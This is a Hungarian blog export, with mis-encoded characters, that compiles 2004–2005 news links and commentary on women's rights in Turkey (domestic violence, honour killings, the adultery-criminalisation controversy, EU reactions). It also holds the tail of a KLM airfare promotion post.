tצrtיnik. Pl. az okt. 15-i jבrat Isztambulbףl 15.20-kor indul, 21.40-kor van Bיcsben. Vissza pl. 16.20-kor indul Bיcsből, 23.50-kor van Isztambulban. </div><div align="justify"></div><div align="justify">Tovבbbi jף hםr, hogy minden 75. utazף, aki szeptemberben KLM-jegyet vesz, mיg egy ingyen retתrjegyet is kap Amszterdamba.</div><div align="justify"><br /></div><div align="justify"><strong>Elיrhetősיgek:</strong> </div><div align="justify">az akciף linkje <a href="http://transactions3.klm.com/ASPActionFares/query.asp?cc=TR&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lang=EN&prod=2922&amp;dep=IST?st=null">angolul</a> <a href="http://www.klm.com/tr_en/index.jsp">a KLM Isztambul angolul</a> <a href="http://www.klm.com/tr_tr/index.jsp">a KLM Isztambul tצrצkl</a></div><div align="justify"><br /></div><div align="justify"><span style="color:#ff0000;">Ha Magyarorszבgrףl utaznבl, nיzd a KLM budapesti Last Minute Ajבnlatait </span><a href="http://www.klm.com/hu_hu/index.jsp"><span style="color:#ff0000;">ezen a linken</span></a><span style="color:#ff0000;"> minden hיten (kb. 45 ezer Ft)</span></div> -false - - - - -Efendi - -2004-09-01T23:01:00+02:00 -2005-04-23T16:30:17Z -2004-07-24T17:30:51Z - -tag:blogger.com,1999:blog-7074887.post-109069025160648086 -A nők helyzete Tצrצkorszבgban -<div align="center"><img src="http://photos1.blogger.com/img/284/1037/400/siddetekirmizikart.jpg" /><br /></div><div align="center"><br /></div><div align="center"><div align="center"></div><div align="justify"><em><strong><span style="color:#000099;">A nők helyzetיvel kapcsolatos aktuבlis hםrek </span></strong></em><a href="http://www.bianet.org/php/haberturuara.php?THaberTuru=KADIN"><em><strong><span style="color:#000099;">tצrצkl</span></strong></em></a><em><strong><span style="color:#000099;"> יs </span></strong></em><a href="http://www.bianet.org/php/haberturuara_eng.php?THaberTuru=KADIN"><em><strong><span style="color:#000099;">angolul </span></strong></em></a><em><strong><span style="color:#000099;">.<br /><br />Tצrצk szervezetek a nők jogaiיrt: </span></strong><a href="http://www.ucansupurge.org/newhtml/"><strong><span style="color:#000099;">Ucan Sprge</span></strong></a><strong><span style="color:#000099;"> </span></strong><a href="http://www.ka-der.org.tr/"><strong><span style="color:#000099;">KA-DER</span></strong></a><strong><span style="color:#000099;"> </span></strong></em><a href="http://www.morcati.org/"><em><strong><span style="color:#000099;">Mor Cati</span></strong></em></a><em><strong><span style="color:#000099;"> </span></strong></em><a href="http://www.acev.org/"><em><strong><span style="color:#000099;">ACEV</span></strong></em></a><em><strong><span style="color:#000099;"> </span></strong><a href="http://www.tapv.org.tr/"><strong><span style="color:#000099;">TAPV</span></strong></a><strong><span style="color:#000099;"> </span></strong><a href="http://www.kssgm.gov.tr/"><strong><span style="color:#000099;">KSSGM</span></strong></a></em></div><div align="justify"><span style="color:#000099;"><em><strong></strong></em><br /></span></div><div align="justify"><em><strong><span style="color:#000099;"></span></strong></em></div><div align="justify"><em><strong><span style="color:#000099;"></span></strong></em></div><div align="justify"><em><strong><span style="color:#000099;">Eurףpai Női Lobby: </span></strong></em><a href="http://www.womenlobby.org/index2.htm"><em><strong><span style="color:#000099;">European Women's Lobby/Lobby europיen des femmes</span></strong></em></a></div><div align="justify"><br /><br /></div><div align="justify"></div><div align="justify"></div><div align="justify"></div><div align="center"><span style="font-size:130%;"><strong>2005.</strong></span><span style="font-size:100%;"> </span><span style="font-size:130%;"><strong>יvi hםrek</strong></span></div><div align="justify"><br /><strong>ֱpr. 21.</strong></div><div align="justify"><strong> <br /></strong></div><div align="justify"></div><div align="justify">A <a href="http://www.wwhr.org/_homepage_en">WOMEN FOR WOMEN'S HUMAN RIGHTS(WWHR)-NEW WAYS</a> vיlemיnye arrףl, amit eddig sikerlt elיrni Tצrצkorszבgban:</div><div align="justify"> <br /></div><div align="justify"></div><div align="justify"><a class="thismenu" href="http://www.wwhr.org/id_917">Turkish Civil and Penal Code Reforms from a Gender Perspective: The success of two nationwide campaigns</a></div><div align="justify"> <br /></div><div align="justify"><span style="font-size:130%;"></span></div><div align="justify"><strong></strong></div><div align="justify"><strong></strong></div><div align="justify"><strong>Mבrc. 9.</strong></div><div align="justify"><strong></strong></div><div align="justify"><strong></strong></div><div align="justify"><strong></strong></div><div align="justify"><strong></strong></div><div align="justify"></div><div align="justify"><strong></strong></div><div align="justify"><strong></strong></div><div align="justify"><strong></strong></div><div align="justify"><strong></strong></div><div align="justify">Eurףpa tiltakozik az isztambuli nődemonstrבciף brutבlis szיtverיse miatt.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify"></div><div align="justify">Nem szeretik, ha a tצrצk rendőr fejbe rתgja a fצldצn fekvő nőt. Nem hiszik, hogy vagy szבz tntető nצ veszיlyt jelent, amelyet csak a legdurvבbb erőszakkal lehet elhבrםtani. Nem gondoljבk, hogy a nőnapot verיssel יs kצnnygבzzal kell nnepelni. Kםnos, hogy a nőket aznap verik a rendőrők, amikor a tצrצk uniףs tagsבgrףl jצnnek tבrgyalni Eurףpבbףl. Nem igen hisznek Tצrצkorszבgnak: eddig azt lבttבk, hogy a tצrצk rendőr/csendőr rapittyבra lőhet terroristagyanתs szemיlyeket (nőket, fiatalkorתakat) - ettől mיg a vizsgבlati időszakra sem fggesztik fel az בllבsבbףl. Sőt, a bűncselekmיnnyel vבdolt rendőrt, csendőrt a testlet sok esetben bתjtatja addig, amםg a bűncselekmיnye el nem יvl - ha kell, 6-8 יvig is. Nagy kבr, hogy - legalבbbis jelenleg - tצrצk kormבny יs a belgyminiszter "maszatol" - azt mondjבk, hogy a tntetők "provokבltבk" a rendőrצket, meg klצnben is, szerte a vilבgban a tntetők kapnak a pofבjukra. A tצrצk miniszterelnצk megint a hazai sajtףt hibבztatja, mert az "felhםvta" Eurףpa figyelmיt az esemיnyekre. Azt azonban elfelejtik: a tntetők kצvethetnek el hibבkat, de a rendfenntartףk nem, s a rendצrsיgnek az utcבn nem a megtorlבs a feladata. Pedig a tצrצk belgyminiszter kצzel egy יve utasםtotta a testletet, hogy nem alkalmazhatnak "arבnytalan erőszakot" a tntetőkkel szemben - ez az utasםtבs most becsődצlt.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify"><div align="justify"></div><div align="justify"></div>Komoly kצvetkezmיnyei vannak az gynek. Az Eurףpa Parlament mבrc. 10-יn <a href="http://www2.europarl.eu.int/omk/sipade2?SAME_LEVEL=1&LEVEL=4&amp;NAV=S&LSTDOC=Y&amp;DETAIL=&PUBREF=-//EP//TEXT+TA+P6-TA-2005-0073+0+DOC+XML+V0//HU">hatבrozottan elםtיlte</a> a tצrצk rendőrsיg בltal tanתsםtott brutalitבst, יs kיrte a Bizottsבgot, hogy kיszםtsen teljes kצrű jelentיst a tצrtיntekről a Parlament szבmבra. A kיrdיst יs a tצrצk nצk helyzetיt napirendre tzik az EP-ben mבrc. 16-בn. Nagy kבr, hogy a tצrצk vezetיs - amely mבr a hבzassבgtצrיs bntethetősיge kיrdיsיben sem בllt a helyzet magaslatבn - rosszul fogta meg az gyet.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify"></div><div align="justify"></div><div align="justify"><strong></strong></div><div align="justify"><strong></strong></div><div align="justify"><strong></strong></div><div align="justify"><strong>Mבrc. 7.</strong></div><div align="justify"><strong></strong><br /></div><div align="justify"><strong></strong></div><div align="justify"><a href="http://index.hu/eu/isztam0307/">Sokkolta az EU-t a tצrצk nődemonstrבciף szיtverיse</a></div><div align="justify"><a href="http://www.radikal.com.tr/haber.php?haberno=145729">Kadinlara 8 Mart dayagi </a>- helyzetjelentיs יs vיlemיnyek a brutבlis rendőri fellיpיsről</div><div align="justify"><a href="http://index.hu/politika/kulfold/0306muslims/">'gy יlt, mint egy nיmet kurva'</a> - ahogy Fatih Akin "Fallal szemben" c. filmjיben mבr lבthattuk. Tצrצkorszבgban 2005. januבrjבban volt olyan nap, hogy nיgy ilyen gyilkossבg tצrtיnt, rיszletek itt (bבr ez ilyen gyakorisבggal tיnyleg nem mindennapos jelensיg): <a href="http://www.bianet.org/2005/03/01_eng/news53001.htm">Four Honor Killings in One Day Across Turkey</a>. Ugyanerrצl: <a href="http://www.radio.hu/index.php?cikk_id=128087">Vallבsi eredetű belviszבlyok a berlini tצrצk kצzצssיgben</a>, Magyar Rבdiף, mבrc. 6.</div><div align="justify"><br /></div><div align="justify"><strong></strong></div><div align="justify"><strong>Febr. 4.</strong></div><div align="justify"><br /></div><div align="justify">A tצrצkorszבgi nők helyzetיről tבjיkozףdott a helyszםnen nemrיg az Eurףpai Parlament Nőjogi יs Esיlyegyenlősיgi Bizottsבgבnak kldצttsיge, amelyet <a href="http://wwwdb.europarl.eu.int/ep6/owa/whos_mep.data?ipid=0&amp;amp;ilg=HU&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;iucd=23866&ipolgrp=&amp;itempl=&imode=&amp;ireturn=">Bauer Edit</a>, a szlovבkiai Magyar Koalםciף Pבrtjבnak alelnצke vezetett. A kldצttsיg ankarai sajtףיrtekezletיn kedvezően szףlt az elmתlt יvi tצrצkorszבgi reformokrףl, de תgy vיlte, hogy a legfontosabb azok gyakorlati megvalףsםtבsa. Az EP-kיpviselők szerint a legnagyobb problיmבt ma a nők foglalkoztatבsa, a politikבban valף rיszvיtele יs a csalבdon belli erőszak jelenti. ֹrdekessיg, hogy az euro-honanyבk javasoltבk Erdogan miniszterelnצknek, aki korבbban lelkes focista volt, hogy a legnיpszerűbb tצrצk jבtיkosokkal יs mבs politikusokkal egytt tartsanak egy meccset, s םgy hםvjבk fel a tצrצk kצzvיlemיny figyelmיt a nőkkel szembeni erőszakra. Erdogan בllםtףlag beleegyezett. A tצbbit majd Ali Baba sportrovatבban... Meg persze az Eurףpai Parlamentben, ahol - a nőjogi bizottsבgban - a kldצttsיg mבrcius 15-יn ismerteti a tצrצkorszבgi helyzetrol szףlף jelentיsיt, amelyet nyבron az EP plenבris lיsen is megvitat.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">Januבr vיgיn az Egyeslt Nemzetek Szצvetsיgיben is terםtיkre kerlt a tצrצkorszבgi nők helyzete. Van ugyanis egy nemzetkצzi egyezmיny a nők elleni diszkriminבciף minden formבjבnak megszntetיsיről (CEDAW), s annak Tצrצkorszבg is rיszese, םgy a kormבnynak nיgyיvente jelentיst kell kיszםtenie a nők helyzetיről. Azt <a href="http://daccessdds.un.org/doc/UNDOC/GEN/N03/464/38/PDF/N0346438.pdf?OpenElement">EZEN A LINKEN</a> lehet olvasni tצbb nyelven (angol, francia, orosz, spanyol). Mivel a kormבnyok hajlamosak csak a szיpre emlיkezni, a civil szervezetek is elő szoktבk terjeszteni a sajat jelentesket az ENSZ-bizottsבgnak. Ezt tettיk a tצrצk civilek is, jelentיsk <a href="http://www.bianet.org/2005/01/01_k/golgetur.doc">ITT OLVASHAT׃</a>.</div><div align="justify"><br /></div><div align="justify">A tצrצk kormבnyjelentיs szerint a (15 יven felli) 23 milliף tצrצk no 21.6 %-a (kצzel 5 milliף fő) םrבstudatlan, mםg a fיrfiaknבl ez az arבny csak 5.6 %. Az 550 fős parlamentben 24 honanya l, a kormבnyban 1 női miniszter van. A prostitתciף (vagy ahogy a jelentיsben בll, sex work) Tצrצkorszבgban legבlis, de engedיlyhez van kצtve, s a nyilvבnoshבzakban dolgozףkra is kiterjed a tבrsadalombiztosםtבs. Tצrצkorszבgban 81 tartomבnyבban צsszesen 8 olyan hely van (2000. יvi adat), ahol a csalבdon belli erőszak elől a tצrצk nők menedיket talבlhatnak. 1995-ben a foglalkoztatottak 30.5 %-a volt nő, 2000-ben mבr csak 25.9 %-a.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">A kormבnyjelentיs tavaly nyבron kיszlt, azףta az ENSZ-bizottsבgnak lehetősיge volt kיrdיseket intיzni annak kיszםtőihez. A 31 kemיny kיrdיs יs a tצrצk kormבny azokra adott vבlaszai <a href="http://www.un.org/womenwatch/daw/cedaw/reports/docs/Turkey/CEDAW-PSWG-2005-I-CRP.2-Add.7-Turkey-E.pdf">EZEN A LINKEN</a> olvashatףak. A vבlaszokbףl kiderl pl., hogy a parlament בltal tavaly elfogadott, de a kצztבrsasבgi elnצk בltal visszadobott helyhatףsבgi tצrvיny az 50 ezer lakosnבl nagyobb teleplיseken kצtelezővי tennי a női menedekhelyek lיtrehozבsבt.</div><div align="justify"></div><div align="justify"><br /></div><div align="justify">ֹrdekes a 17. kיrdיsre adott vבlasz. Az ENSZ-bizottsבg a korבbbi tצrצk jelentיs utבn תgy foglalt בllבst, hogy srgősen szksיg van a tצrצkorszבgi kisebbsיgekhez tartozף nők helyzetיnek figyelemmel kםsיrיsיre יs a tצrצk hatףsבgoknak בllandף erőfeszםtיseket kell tennik annak יrdekיben, hogy maradיktalanul biztosםtsבk szבmukra a CEDAW-ban megfogalmazott jogok יrvיnyeslיsיt. A 17. kיrdיs az ő helyzetkrol יrdeklődott, beleיrtve a kurdokat is. Nos, a tצrצk fיl nem tud arrףl, hogy lennיnek kisebbsיgek az orszבgban, arrףl meg főleg nem, hogy bבrmilyen klצn diszkriminבciף volna velk szemben, sőt, mi tצbb, a vבlasz szerint a tצrצk azt tekintenיk diszkriminבciףnak, ha a lakossבgrףl etnikai hovatartozבs szerint vennיnek fel statisztikai adatokat. (Azzal persze jףl elvannak, hogy a tצrצk szemיlyigazolvבnyokban kצtelezően fel kell tntetni tulajdonosa vallבsi hovatartozבsבt.)</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">A 31. kיrdיsre adott vבlaszbףl megtudhatjuk, hogy az abortusz akkor nem minősl bűncselekmיnynek, ha a magzat kevesebb, mint 10 hetes, s az abortuszhoz szksיg van a fיrj םrבsos hozzבjבrulבsבra.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">Kiderl az is, hogy az תj BTK az תn. becsletbeli gyilkossבgokat minősםtett bűncselekmיnynek tekinti, s az elkצvetőket יletfogytiglan tartף szabadsבgvesztיssel sתjtjבk. (Ez mבr csak azיrt is dvצzlendő, mert volt olyan nap ez יv januבrjבban, amikor Tצrצkorszבgban 4 ilyen gyilkossבg tצrtיnt.) </div><div align="justify"></div><div align="justify">Ezek pedig a CEDAW konklתziףi: <a href="http://www.bianet.org/2005/03/01_eng/news54593.htm">Encourage Women For More Active Participation</a></div><div align="justify"></div><div align="justify"><br /></div><div align="center"><span style="font-size:130%;"><strong>2004. יvi hםrek</strong></span></div><div align="center"><span style="font-size:130%;"><strong><br /></div></strong></span><div align="justify"></div><div align="justify">Talבn nem mindenki ismeri az Amnesty International emberi jogi szervezet 2004. jתnius 2-בn kצzzיtett jelentיsיt a nők elleni, csalבdon belli erőszakrףl Tצrצkorszבgban. Itt elolvashatף <a href="http://www.amnesty-turkiye.org/sindex.php3?sindex=ozdais0206200403"><strong>tצrצkl</strong></a><strong>, </strong><a href="http://web.amnesty.org/library/index/engeur440132004"><strong>angolul</strong></a><strong>, </strong><a href="http://web.amnesty.org/library/index/fraEUR440132004?Open&of=fra-TUR"><strong>franciבul</strong></a><strong>. </strong>A nők elleni erőszakkal szembeni tצrצkorszבgi kampבnyrףl <strong><a href="http://www.amnesty-turkiye.org/sindex.php3?sindex=vifois0703200401">itt</a></strong> lehet olvasni.<br /></div><div align="justify"><br /></div><div align="justify">Az תj Polgבri Tצrvיnykצnyv kיt יvvel ezelőtti elfogadבsa nagy lיpיs volt a női egyenjogתsבg megteremtיse irבnyבban, s igen komoly vבltozבsok vבrhatףak, ha ebben az יvben elfogadjבk az תj Bntető Tצrvיnykצnyvet, s az majd - egy יves trelmi időszak utבn - hatבlyba lיp.<br /><br />Jude יs mבsok kיtsיgei a postokban nem alaptalanok, de az is biztos, hogy a tצrצkצk - ahogy a tצbbi nבciף is - sokfיlיk. Van, aki a tenyerיn hordozza a nejיt, s van, aki hבzassבgkצtיs előtt elvיgezteti - s erre egyelőre lehetősיge van - a szzessיgi vizsgבlatot, majd az asszonyt bezבrja a lakבsבba, ahol a rokonsבg felgyeli. 2003-ban kb. 40 olyan esetet regisztrבlnak, amikor a csalבd meggyilkolta a nőt, akinek a becsletיn "folt esett", s ezeket a jelensיgeket a tבrsadalom egy rיsze יs gyakran a <strong><a href="http://www.bianet.org/2004/07/01_k/39488.htm">hatףsבgok</a></strong> is meglehetősen elnיzően kezelik. Az תj BTK talבn fordulatot hoz a kיrdיsben. Egyelőre azonban nem vיletlenl kampבnyolnak a nők a <strong><a href="http://www.bianet.org/2004/07/01_eng/news38333.htm">"Menedיket akarunk, nem sםrt"</a></strong> feliratת transzparensekkel, arra utalva, hogy a hatףsבgoknak menedיket kellene biztosםtaniuk a csalבdon belli erőszak elől meneklni kםvבnף nőknek, s nem kajבn vigyorral hazakldenik őket a rendőrsיgről, hogy menj, yenge, bיklj meg a fיrjeddel.<br /><br /></div><div align="justify"><br /></div><div align="justify"><a href="http://www.bianet.org/2004/08/01_eng/news41210.htm">Felgyתjtotta felesיgיt egy tצrצk fיrfi - a nő hiבba kיrt előzőleg segםtsיget a hatףsבgoktףl</a> 2004. aug.23. A nők elleni erőszak תjabb esete Tצrצkorszבgban. A szerencsיtlen 21 יves nő belehalt sיrlיseibe. Ez יv első felיben a bםrףsבgok csak Denizli tartomבnyban <a href="http://www.bianet.org/2004/08/01_eng/news40741.htm">146 fיrjet tiltottak el ideiglenesen </a>attףl, hogy csalבdjuk kצzelיbe merיszkedjenek. Az ok: rossz bבnבsmףd a felesיggel vagy a gyermekekkel.</div><div align="justify"><br /></div><div align="justify"><a href="http://www.bianet.org/2004/08/01_eng/news41404.htm">Tiltakozבs a szzessיgi vizsgבlatok ellen</a> 2004. aug. 26.</div><div align="justify"><br /></div><div align="center"><strong><span style="color:#ff0000;">Szegיny embert az בg is hתzza - a kormבny rosszul יbredt יs kitalבlta, hogy ezentתl legyen bűncselekmיny a hבzassבgtצrיs</span></strong></div><div align="center"><strong><span style="color:#ff0000;"></span></strong><br /></div><div align="justify">2004. szept. 1.</div><div align="justify"><br /></div><div align="justify">Szיp תj reformvilבg! Augusztus 31-יn a kormבnypבrt vבltoztatבsokat javasolt a parlamentben szeptember mבsodik felיben megvitatבsra kerlő תj Bntető Tצrvיny mבr egyeztetett szצvegיben. Eszerint <span style="color:#ff0000;">bekerlne a BTK-ba a hבzassבgtצrיs bűncselekmיnye.</span> <a href="http://story.news.yahoo.com/news?tmpl=story&amp;u=/nm/20040901/od_nm/rights_turkey_adultery_dc_1">A tצrצk igazsבggyminiszter az indםtvבnyt a tבrsadalom rיszיről megnyilvבnulף igיnnyel magyarבzta.</a> Erdogan miniszterelnצk szintיn tבmogatta a javaslatot. A kormבnypבrt szeretnי azt is elיrni, hogy kevיsbי legyen szigorת a bntetיse azoknak, akiket a jצvőben elםtיlnek az תn- becsletbeli gyilkossבgok miatt - lבsd a fentiekben -, vagyis azoknak a derיk fיrfiembereknek, akik a csalבd nőtagjבt elteszik lבb alףl, ha "fיlrelיp". Amתgy a hבzassבgtצrיs 1998-ban kerlt ki a BTK-bףl, addig jףrיszt nőket םtיltek el ezzel a vבddal. 1998-ig a hבzassבgtצrיs<span style="color:#ff0000;"> bntetיsi tיtele 6 hףnaptףl 3 יvig terjedő szabadsבgvesztיs volt</span>. Szףval, irבny Eurףpa - mבr csak arrףl kellene a nיpet megkיrdezni, nem ףhajtja-e esetleg a halבlbntetיs visszaבllםtבsבt (akarni szokta, ezיrt nem kיrdezik). A tצrצk nőszervezetek kצrיben a kormבny indםtvבnyai miatt <a href="http://www.bianet.org/2004/08/01_eng/news42170.htm">nagy a felzתdulבs</a>.<br /><a href="http://www.bianet.org/2004/09/01/42109.htm">Link</a> (TR)</div><div align="justify"><br /></div><div align="justify"><span style="color:#ff0000;">Szeptember 3-בn az Eurףpai Uniף is beintett.</span> Az Eurףpai Bizottsבg valahogy תgy foglalt בllבst, hogy a tצrצk kormבny pבr szבz יvvel el van maradva, amikor azt בlmodja, hogy bntetni kellene a hבzassבgtצrיst. Hlyesיgek helyett foglalkozna inkבbb azzal, mondtבk Brsszelben, hogy tovבbb csiszolgatja a BTK tervezetיt, volna vele mיg elיg teendő. Az Uniף szerint a hבzastבrsak fיlrelיpיse a magבnszfיrבba tartozik, nem EU-konform viselkedיs abbףl bntetőgyet csinבlni. A bővםtיsi biztos szףvivője meg azt mondta (ahogy יn יrtelmezem): rossz fיnyt vet a tצrצk kormבnyra, ha az efendik יs a hanimefendik alsףneműjיben matat, az eurףpaiak pedig ezutבn mיg jobban lelombozףdnak, ha Tצrצkorszבg leendő uniףs tagsבgבra gondolnak. gyhogy pבrtunk יs kormבnyunk most jףl bekavart, kivבncsi vagyok, hogy fog kimבszni a dologbףl. Verheugen bővםtיsi biztos a jצvő hיt nagy rיszיt Tצrצkorszבgban tצlti, aztבn mבr csak pבrat kell aludni יs kezdődik a tצrצk parlament kיthetes vitבja az תj BTK-rףl. </div><div align="justify"><br /></div><div align="justify">A tצrצkl tanulףk meg jף, ha megjegyzik: a "zina" (hבzassבgtצrיs) cםmszף alatt kereshetik ki a BTK-ban, mennyit kell lelnik, ha hבzastבrskיnt, netבn bűntבrskיnt (vagyis gaz csבbםtףkיnt) alperesi minősיgben idיzik be őket a bםrףsבgra.</div><div align="justify"><br /></div><div align="justify"><span style="color:#ff0000;">Szept. 7.</span></div><div align="justify"></div><div align="justify">A <a href="http://story.news.yahoo.com/news?tmpl=story&u=/nm/20040907/od_nm/turkey_adultery_dc_1">tצrצk miniszterelnצk megint megvיdi a kormבny indםtvבnyבt</a> a hבzassבgtצrיs bűncselekmיnnyי nyilvבnםtבsבra. Nagy hiba, messze nincs mיg vיge az gynek. Ilyenkor kellene lecserיlni a tanבcsadףkat.</div><div align="justify"><br /></div><div align="justify"><span style="color:#ff0000;">Szept.9.</span></div><div align="justify">Tetőzni lבtszik a botrבny, s a hםr most mבr eljutott a magyar mיdiבba is.</div><div align="justify"><br /></div><div align="justify"><strong>Verheugen a vilבgi tצrvיnykezיs betartבsבra figyelmeztette Ankarבt<br /></strong><br />Isztambul, 2004. szeptember 9., cstצrtצk (MTI/AFP) - Gnter Verheugen, az Eurףpai Uniף bővםtיsi biztosa bםrבlta a tצrצk kormבnyt amiatt, hogy tצrvיnyesen bntetendővי akarja tenni a hבzassבgtצrיst.<br /></div><div align="justify"><br />Nיgynapos tצrצkorszבgi lבtogatבsבnak zבrבsakיnt Verheugen cstצrtצkצn interjתt adott az NTV tצrצk hםrtelevםziףnak, arra kיrve a tצrצk kormבnyt, hogy gondolja בt mיg egyszer ezt a tervיt.<br /><br /></div><div align="justify">A hבzassבgtצrיs elםtיlhetősיgיre vonatkozף tצrvיnytervezet aggodalmakat vבltott ki Eurףpבban, alig nיhבny hיttel azelőtt, hogy az Eurףpai Bizottsבg előterjesztenי a Tצrצkorszבg בhםtott EU-tagsבga szempontjבbףl sorsdצntő orszבgjelentיsיt - magyarבzta Verheugen. "Tצrtיnelmi trיfa" lenne, ha Tצrצkorszבgnak vיgl a hבzassבgtצrיs bntethetősיge vagy az EU-tagsבg kצzצtt kellene vבlaszolnia - fogalmazott a biztos, nyםltan hibבnak minősםtve a tצrvיnytervezetet.<br /><br /></div><div align="justify">Recep Tayyip Erdogan tצrצk miniszterelnצk mיrsיkelt iszlבm irבnyvonalת tצmצrlיse, az Igazsבg יs Fejlődיs Pבrtja (AKP) a jצvő hיten kיszl benyתjtani a parlamentben a bntető tצrvיnykצnyv olyan mףdosםtבsבt, amelynek יrtelmיben a hבzassבgtצrיst bצrtצnbntetיssel sתjtanבk. Erdogan ezzel konzervatםv vallבsos szavazףtבborבnak szבndיkozik engedmיnyt tenni, a tצrvיnytervezetet azonban a tצrצk kצzvיlemיny nagy rיsze elutasםtja. Az AKP vezetősיge egy szerda esti lיsיn megerősםtette, hogy ragaszkodik a hבzassבgtצrיs bntethetősיgיnek bevezetיsיhez. Verheugen a Vatan cםmű lapnak nyilatkozva azt mondta, hogy a kormבny szבndיka olyan benyomבst kelt, mintha Tצrצkorszבg az iszlבm jogot akarnב bevezetni.<br /><br /></div><div align="justify">Az Eurףpai Bizottsבg oktףber elejיn terjeszti elő jelentיsיt a tצrצkorszבgi reformokrףl, amely alapul szolgבl majd az EU בllam- יs kormבnyfői decemberben meghozandף dצntיsיnek arra vonatkozףan, hogy megkezdjיk-e a tבrgyalבsokat az orszבg uniףs csatlakozבsבrףl. Az emberi יs kisebbsיgi jogok helyzete, a demokratizבlבs fontos rיszיt kיpezik majd a tצrצk jelצltsיg megםtיlיsיnek.</div><div align="justify"><br /></div><div align="justify"><a href="http://index.hu/eu/adultery5286/">Bebצrtצnצznיk a hבzassבgtצrőket Tצrצkorszבgban,</a> Index, szept.9.<br /></div><div align="justify"><a href="http://www.turkishpress.com/turkishpress/news.asp?ID=26704">Turkish FM Strongly Criticizes Discussions On Adultery</a> AA szept.9. - a tצrצk klgyminiszter szerint a sajtף a hibבs! (ez azיrt elיggי fantבziaszegיny magyarבzat...)</div><div align="justify"><br /></div><div align="justify">A kormבnypבrt elnצksיge azיrt cstצrtצk este צsszelt, sokat mבr nem nagyon lehet izmozni ebben az gyben. </div><div align="justify"><br /></div><div align="left"><span style="color:#ff0000;">szept.13.</span></div><div align="justify"><br /><span style="color:#ff0000;"><strong>Women's rights in Turkey<br /></strong></span>International Herald Tribune<br /><br />As part of a slate of reforms aimed at securing membership in the European Union, Turkey's ruling party has proposed a major overhaul of the country's criminal code. There is much value in the effort.</div><div align="justify"><br />Prompted by a coalition of women's groups, it includes stronger laws against rape, sexual assault and sexual harassment. Unfortunately, several other provisions affecting women are dangerously regressive, seeking to codify in law beliefs and practices that reflect the party's own conservative Islamic roots rather than the EU's vision of human rights.</div><div align="justify"><br />The most objectionable laws would criminalize adultery, penalize consensual sexual relations between teenagers aged 15 to 18, and neglect to explicitly ban and criminalize virginity testing. The adultery clause is especially backward, given that Turkey decriminalized adultery - for men, in 1996; for women, in 1998 - on the grounds that the law discriminated against women.</div><div align="justify"><br />A recent report by Amnesty International estimated that at least one-third of Turkish women are victims of domestic violence in which they are "hit, raped and, in some cases, killed or forced to commit suicide." Turkey must demonstrate a political willingness to end such abuses.</div><div align="justify"><br />The Turkish prime minister, Recep Tayyip Erdogan, should postpone sending the new penal code to Parliament, which he is scheduled to do this week, until his party officials revise it - deleting laws against consensual sex and including explicit protections for women. Otherwise, he is handing Europeans who scorn Turkey's European Union membership bid a big reason to vote no in December, when the union will decide whether to start formal accession talks with Turkey. In that unfortunate event, Erdogan would have no one to blame but himself.<br /><br /><strong><span style="color:#ff0000;">Az Eurףpai Bizottsבg figyelmezteti Tצrצkorszבgot a hבzassבgtצrיs bntethetősיge gyיben</span></strong></div><div align="justify"><strong><span style="color:#ff0000;"></span></strong><br /></div><div align="justify"></div><div align="justify">Brsszel, 2004. szeptember 13., hיtfő (MTI/AFP) - Az Eurףpai Bizottsבg hיtfőn megismיtelte Tצrצkorszבghoz intיzett figyelmeztetיsיt a hבzassבgtצrיst bntetendővי tevő tצrvיnytervezet gyיben, utalva arra, hogy Gnter Verheugen, az uniף bővםtיsi biztosa mבr intיzett "barבti figyelmeztetיst" Ankarבhoz ezzel kapcsolatban.</div><div align="justify"><br />Jean-Christophe Filori bizottsבgi szףvivő mindamellett ףvakodott attףl, hogy "akadבlynak" minősםtse a tצrvיnytervezetet a tצrצk EU-csatlakozבs esיlyeit illetően, szemben Karel De Gucht belga klgyminiszterrel, aki "komoly akadבlynak" nevezte azt Tצrצkorszבgnak az uniף felי vezető תtjבn. "Szabad vilבgban יlnk. Ha valaki az akadבly szףt akarja hasznבlni, megteheti" - mondta a szףvivő.</div><div align="justify"><br />Verheugen a mתlt hיten Tצrצkorszבgban jבrva egyebek kצzt kijelentette: a hבzassבgtצrיs tervezett bntethetősיgיt "תgy lehetne יrtelmezni, hogy Tצrצkorszבgban engedmיnyt tesznek a tבrsadalom legkonzervatםvabb elemeinek, יs ez megzavarhatnב az uniףban az emberek gondolkodבsבt Tצrצkorszבgrףl".</div><div align="justify"><br />Az Eurףpai Bizottsבg a tervek szerint oktףber 6-בn teszi le ajבnlבsבt az eurףpai vezetőknek, hogy megkezdődjenek-e a csatlakozבsi tבrgyalבsok Ankarבval. A tagorszבgok בllam- יs kormבnyfői december 17-i brsszeli csתcsיrtekezletkצn hozzבk meg a dצntיst.</div><div align="justify"><br /></div><div align="justify"><span style="color:#ff0000;">szept.14.</span></div><div align="justify"><a href="http://www.euobserver.com/?sid=9&amp;aid=17280">A kormבny mיgsem terjeszti be a hבzassבgtצrיs bntethetצsיgיre vonatkozף indםtvבnyt a parlamentben!</a></div><div align="justify"><br /></div><div align="justify">Akkor minek kellett feleslegesen lejבratnia magבt? Mert az eurףpai reakciףkat azיrt előre lehetett lבtni, meg a <a href="http://www.bianet.org/2004/09/01_eng/news43062.htm">tצrצk nőszervezetek is egyre harciasabbak</a>. Most azיrt el lehet mondani a <a href="http://www.bianet.org/2004/09/01_eng/news43061.htm">vבlasztףknak</a>, hogy a rתt eurףpaiak megint betettek, pedig hogy igyekeztnk... Amתgy lenne mיg gyomlבlnivalף a BTK-ban: a tervezet szerint fennmarad a szzessיgi teszt, s bntetnיk a 15-18. יv kצzצttiek szexuבlis kapcsolatבt, mיg akkor is, ha mindkיt fיl benne van a dologban. Persze, majd kiderl, ma צsszelt a parlament, rendkםvli lיsen, kיt hיt van a BTK elfogadבsבra. Volt idő mיlבzni az תj bntető kףdexen, hiszen az előzőt 1926-ban fogadtבk el.</div><div align="justify"><br /></div><div align="justify">Azon is lehetne gondolkodni, meddig lehet tצbbnejűsיg Tצrצkorszבgban? 